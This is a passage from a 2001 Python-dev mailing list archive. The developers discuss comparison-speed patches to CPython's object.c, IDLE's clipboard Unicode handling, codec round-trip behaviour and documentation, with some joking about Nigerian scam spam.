tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those . reads-every-spam-he-gets-top-to-bottom-ly y'rs - tim From esr at thyrsus.com Tue May 15 05:53:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji at fourthought.com Tue May 15 06:26:31 2001 From: uche.ogbuji at fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was th only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right. "Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji at fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Tue May 15 08:28:34 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='??' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "?????????????????????????????????" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef \xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. Another clue: if I paste the s='??' snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem: >>> s='??' >>> s '\xe4\xf6' >>> Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard: TEXT LOCALE OEMTEXT But when I copy from Guido's email under Outlook 2000, it's DataObject Rich Text Format Rich Text Format Without Objects RTF as Text TEXT UNICODTEXT Ole Private Data LOCALE OEMTEXT Under Character Map, it's Rich Text Format TEXT LOCALE OEMTEXT So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Tue May 15 08:44:23 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to if (v == w && op == Py_EQ) /* then return Py_True */ if (v == w && op == Py_NE) /* then return Py_False */ The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? Please have a look at the patch below. Since I made a CVS update since yesterday, I had to readjust the baseline results: 0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790 The patch moves the case "equal types, supporting cmp" to somewhat earlier, just after the attempt to do richcompare. Now I get 0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760 So while there is some saving, this is not as good as implementing richcompare. > I don't see any reason "in principle" that compares couldn't be much > faster, and via the usual gimmicks: bigger, smarter functions that > remember what they've already determined so don't need to figure it > out over and over again, and fast paths to favor common cases at the > expense of comparisons from Mars. I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently. Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead, except for PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare. For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work. Regards, Martin Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -u -r2.131 object.c --- object.c 2001/05/11 03:36:45 2.131 +++ object.c 2001/05/15 06:16:53 @@ -477,16 +477,6 @@ if (PyInstance_Check(w)) return (*w->ob_type->tp_compare)(v, w); - /* If the types are equal, don't bother with coercions etc. */ - if (v->ob_type == w->ob_type) { - if ((f = v->ob_type->tp_compare) == NULL) - return 2; - c = (*f)(v, w); - if (PyErr_Occurred()) - return -2; - return c < 0 ? -1 : c > 0 ? 1 : 0; - } - /* Try coercion; if it fails, give up */ c = PyNumber_CoerceEx(&v, &w); if (c < 0) @@ -590,15 +580,21 @@ -1 if v < w; 0 if v == w; 1 if v > w; + If the object implements a tp_compare function, it returns + whatever this function returns (whether with an exception or not). */ static int do_cmp(PyObject *v, PyObject *w) { int c; + cmpfunc f; c = try_rich_to_3way_compare(v, w); if (c < 2) return c; + if (v->ob_type == w->ob_type + && (f = v->ob_type->tp_compare) != NULL) + return (*f)(v, w); c = try_3way_compare(v, w); if (c < 2) return c; @@ -760,16 +756,9 @@ } static PyObject * -try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +convert_3way_to_object(int op, int c) { - int c; PyObject *result; - - c = try_3way_compare(v, w); - if (c >= 2) - c = default_3way_compare(v, w); - if (c <= -2) - return NULL; switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; @@ -782,16 +771,46 @@ Py_INCREF(result); return result; } + static PyObject * +try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +{ + int c; + + c = try_3way_compare(v, w); + if (c >= 2) + c = default_3way_compare(v, w); + if (c <= -2) + return NULL; + return convert_3way_to_object(op, c); +} + +static PyObject * do_richcmp(PyObject *v, PyObject *w, int op) { PyObject *res; + cmpfunc f; + res = try_rich_compare(v, w, op); if (res != Py_NotImplemented) return res; Py_DECREF(res); + + /* If the types are equal, don't bother with coercions etc. + Instances are special-cased in try_3way_compare, since + a result of 2 does *not* mean one value being greater + than the other. */ + if (v->ob_type == w->ob_type + && !PyInstance_Check(v) + && (f = v->ob_type->tp_compare) != NULL) { + int c; + c = (*f)(v, w); + if (PyErr_Occurred()) + return NULL; + return convert_3way_to_object(op, c); + } return try_3way_to_rich_compare(v, w, op); } From tim.one at home.com Tue May 15 09:33:06 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like whar are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised? Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one at home.com Tue May 15 09:47:16 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal at lemburg.com Tue May 15 10:19:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 15 10:32:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. > > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Tue May 15 11:26:32 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit: if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) { /* Shortcut: if the lengths differ, the tuples differ */ PyObject *res; if (op == Py_EQ) res = Py_False; else res = Py_True; Py_INCREF(res); return res; } was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths). more-measuring-less-guessing-ly y'rs - tim From thomas at xs4all.net Tue May 15 13:51:06 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 15 14:10:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. You can now do things like these: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' >>> "abc???".decode('latin-1') u'abc\xe4\xf6\xfc' >>> "abc???".decode('latin-1').encode('latin-1') 'abc\xe4\xf6\xfc' >>> "Hello World !".encode('rot13') 'Uryyb Jbeyq !' So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Tue May 15 14:11:26 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer this far: $155,000,000) From guido at digicool.com Tue May 15 17:27:31 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400." References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at acm.org Tue May 15 17:29:10 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like whar are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised? Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. I've beefed up the desciption of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Tue May 15 18:35:09 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an excercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Tue May 15 20:21:00 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design. http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas at python.ca Tue May 15 20:51:20 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started download the whole .mov files. Neil From martin at loewis.home.cs.tu-berlin.de Tue May 15 21:45:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get Calls to string_richcompare: 2378660 Calls with different types: 33992 (ie. one is not a string) Calls with identical strings: 120517 Calls where lens decide !EQ: 1775716 ---------------------------- Calls richcmp -> oldcomp: 448435 Total calls to oldcomp: 1225643 Calls oldcomp -> memcmp: 860174 So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%. If I remove the test for "len decides !EQ", I get #riches: 2358322 #riches_ni: 34108 #idents_decide: 102050 #lens_decide: 0 -------------------------------------- rest(computed): 2222164 #comps: 2949421 #memcmps: 917776 So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, but looking at the first byte also had: lens_decide: 1784897 lens_decide_firstbyte_wouldhave:1671148 So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call. To support the thesis that Py_EQ is the common case for strings, I counted the various operations: pyEQ:2271593 pyLE:9234 pyGE:0 pyNE:20470 pyLT:22765 pyGT:578 Now, that might be flawed since comparing strings for equal is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python: riches:21640 riches_ni:76 riches_ni1:0 idents:2885 idents_decide:2885 lens_decide:9472 lens_decide_firstbyte_wouldhave:6223 comps:26360 memcmps:19224 pyEQ:20093 pyLE:46 pyGE:1 pyNE:548 pyLT:876 pyGT:0 That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF. Regards, Martin From tim at digicool.com Tue May 15 22:22:37 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons): """ BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> C() < C() 1 >>> (C(),) < (C(),) 0 >>> That doesn't make sense -- provided you believe the defn. of C makes sense. """ From guido at digicool.com Tue May 15 23:36:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote: > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ returns false > for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C makes sense. I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Tue May 15 22:59:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> > Of course. But except for instance objects, answering "does the type > implement tp_richcompare?" is one lousy pointer check Almost - you also have to check the type flag. > and the answer will usually be-- provided we don't start stuffing > code into *every* object's tp_richcompare slot! --"no, so I can go > to tp_compare immediately". Coercions and richcmps are the oddball > cases today. I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite. riches 3040952 # Calls to PyType_RichCompare eqs 2828345 # Calls where the types are equal String 2323122 Float 141507 Int 125187 Type 99477 Tuple 84503 Long 30325 Unicode 10782 Instance 9335 List 2997 None 383 Class 318 Complex 219 Dict 57 Array 49 WeakRef 34 Function 11 File 11 SRE_Pattern 10 CFunction 9 Lock 8 Module 1 So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Those calls together cover 93% of the richcompare calls. Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get riches 88465 eqs 59279 String 48097 Int 5681 Type 3170 Tuple 760 List 492 Float 332 Instance 269 Unicode 243 None 225 SRE_Pattern 4 Long 3 Complex 3 The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers. The last example is idle, where I just did an "import httplib", for fun. riches 50923 eqs 49882 String 31198 Tuple 8312 Type 7978 Int 1456 None 600 